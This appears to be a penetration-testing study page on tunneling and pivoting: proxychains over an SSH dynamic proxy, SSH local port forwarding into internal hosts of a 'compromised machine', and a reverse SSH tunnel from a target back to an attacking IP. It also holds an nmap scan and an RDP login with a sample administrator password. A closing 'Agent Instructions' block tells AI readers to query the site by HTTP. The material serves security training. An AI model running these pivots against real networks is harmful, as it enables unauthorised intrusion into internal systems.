# Tunneling

## Proxychains

Comment the **proxy\_dns** line in the **/etc/proxychains4.conf** file

#### Create a Forward Proxy by connecting to machine via SSH and port forward default Proxychains port

```purebasic
ssh -f -N -D 9050 root@10.10.100.2 

-f backgrounds ssh
-N doesnt execute remote commands
-D bind with port 9050
```

#### Use Proxychains with commands

```bash
 proxychains nmap -sC -sV -T4 10.10.200.0/24
```

```bash
proxychains xfreerdp /u:administrator /p:'Password1' /v:10.10.200.225
```

## SSH Tunneling

There are two ways to create a SSH tunnel using the SSH client which are port forwarding, and creating a [forward proxy](#proxychains)

### SSH Port Forwarding

Create a link to an internal webserver (172.16.0.10:80) using port **8000** and SSH access to the compromised machine (172.16.0.5).

```bash
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
```

* -L  creates a link to the **Local Port**
* -f  backgrounds the shell
* -N  no commands to be executed

You have **SSH** access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80). Forward it to port 8000 on your machine

```bash
ssh -L 8000:127.0.0.1:80 user@172.16.0.50 -fN
```

### Reverse SSH Connection (ABSOLUTE NO NO)

Anyways..

Very **risky** but ideal if you have a shell on the compromised server but no SSH access.

Generate a new key pair

```
ssh-keygen
```

Copy the contents of the public key (the file ending with **.pub**), then edit the **\~/.ssh/authorized\_keys** file on your ownmachine. You may need to create the **\~/.ssh** directory and **authorized\_keys** file first.

Paste this line on a new line in the public key

```
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty
```

Start the SSH server

```
sudo systemctl start ssh
```

Transfer the private key and connect back to your machine

```
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT $USERNAME@$ATTACKING_IP -i KEYFILE -fN
```

Should mainly be used for any internal webapps

<figure><img src="/files/xSLRFnkfRXPxmE42ZgOB" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QGOamgLRxaIRZt2rMvJP" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/post-exploitation/pivoting/tunneling.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.